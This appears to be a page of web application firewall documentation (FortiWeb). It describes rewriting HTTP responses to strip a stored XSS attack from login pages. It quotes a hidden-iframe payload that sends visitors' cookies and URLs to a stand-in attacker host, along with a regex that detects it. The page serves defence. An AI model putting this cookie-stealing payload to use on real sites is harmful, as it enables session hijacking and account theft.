Rewriting & redirecting : Example: Sanitizing poisoned HTML
 
Example: Sanitizing poisoned HTML
Example.com is a cloud hosting service provider that has just bought several FortiWebs. Thousands of customers rely on it to maintain database-backed web servers. Before FortiWeb was added to its network, its web servers were regularly being attacked. Without HTTP-savvy intrusion detection and filtering, these posts poisoned many of its web applications by using XSS to inject stored clickjacking attacks into login pages.
Example.com wants to mitigate the effects of prior attacks to protect innocent clients while its incident response team finishes forensic work to audit all applications for impact and complete remediation. To do this, it will rewrite the body of offending responses.
Example.com’s incident response team has already found some of the poisoned HTML that is afflicting some login pages. All major web browsers are currently vulnerable.
It replaces the login pages of the web application with a hidden frame set which it uses to steal session or login cookies and spy on login attempts. The attacker can then use stolen login credentials or use the fraudulent session cookies. For bank clients, this is especially devastating: the attacker now has complete account access, including to credit cards.
To mitigate effects, example.com wants to scrub the malicious HTML from responses, before they reach clients that could unwittingly participate in attacks, or have their identities stolen.
To do this, FortiWeb will rewrite the injected attack:
<iframe src="javascript:document.location.href=
‘attacker.example.net/peep?url=‘+
parent.location.href.toString()+‘lulz=‘
escape(document.cookie);"
sandbox="allow-scripts allow-forms"
style="width:0%;height:0%;position:absolute;left:-9999em;">
</iframe>
into a null string to delete it from the infected web server’s response. FortiWeb will replace the attack with its own content:
<script src="http://irt.example.com/toDo.jss></script>
so that each infected response posts the infected host name, URL, and attack permutation to a “to do” list for the incident response team, as well as notifying the impacted customer.
Since attackers often try new attack forms to evade filters, the regular expression uses a few techniques for flexible matching:
case insensitivity — (?i)
alternative quotation marks — ["'`?“”„?‚’‘'?‹›«»]
word breaks of zero or more white spaces — (\s)*
word breaks using forward slashes instead of white space — [\s\/]*
zero or more new line breaks within the tag — (\n|.)*
Table 43: Example HTML body rewrite using regular expressions
HTTP Body
Regular Expression in URL match condition
(?i)<(\s)*iframe[\s\/]*src=(\s)*["'`?“”„?‚’‘'?‹›«»]javascript:(\n|.)*</iframe>
Replacement
<script src="http://irt.example.com/toDo.jss></script>
See also
Defining custom data leak & attack signatures
Regular expression syntax
What are back-references?
Cookbook regular expressions